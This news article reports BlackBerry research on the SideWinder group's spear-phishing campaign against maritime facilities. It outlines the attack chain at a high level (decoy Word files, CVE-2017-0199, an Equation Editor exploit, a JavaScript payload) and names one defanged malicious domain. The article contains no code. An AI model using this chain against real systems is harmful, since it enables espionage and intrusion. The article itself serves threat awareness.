Hackers Target Maritime Facilities With Malware
Researchers have uncovered a new cyber attack campaign believed to originate from India, that has been active since 2012, which uses spear-phishing to deliver malicious payloads that trigger the attack chains.
This campaign is attributed to a nation-state advanced persistent threat group (APT) known as SideWinder, which is though the be behind an espionage campaign targeting ports and maritime facilities in the Indian Ocean and the Mediterranean.
Also known as Rattlesnake and Razor Tiger, SideWinder has been active since at least 2012, mainly targeting government, military, and businesses for the purpose of cyber espionage.
The Research & Intelligence Team at BlackBerry say that targets of the spear-phishing campaign include countries like Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal, and the Maldives and is assessed to be affiliated with India.
The latest set of attacks employs baited-traps on topics related to sexual harassment, employee termination and salary cuts in order to trick recipients into opening decoy MS Word documents.
Once the decoy file is opened, it activates a known security flaw (CVE-2017-0199) to establish contact with a malicious domain that masquerades as Pakistan's Directorate General Ports and Shipping ("reports.dgps-govtpk[.]com") to retrieve a Rich Text Format (RTF) file.
The RTF document downloads a document that exploits another years-old security vulnerability in the Microsoft Office Equation Editor, with the goal of executing a small piece of executable code used as a payload, built to exploit vulnerabilities in a system or carry out malicious commands that's responsible for launching JavaScript code, but only after ensuring that the compromised system is legitimate and is of interest to the threat actor.
While the BlackBerry researchers have not captured the final payload, they believe the JavaScript malware delivered by SideWinder is intended collect intelligence and compromising material.
BlackBerry | Hacker News | Security Week | Dark Reading | Cyber Express | Security Affairs
Image: Ideogram
You Might Also Read:
A Database Tracking Maritime Cyber Attacks:
If you like this website and use the comprehensive 6,500-plus service supplier Directory, you can get unrestricted access, including the exclusive in-depth Directors Report series, by signing up for a Premium Subscription.
- Individual £5 per month or £50 per year. Sign Up
- Multi-User, Corporate & Library Accounts Available on Request
- Inquiries: Contact Cyber Security Intelligence
Cyber Security Intelligence: Captured Organised & Accessible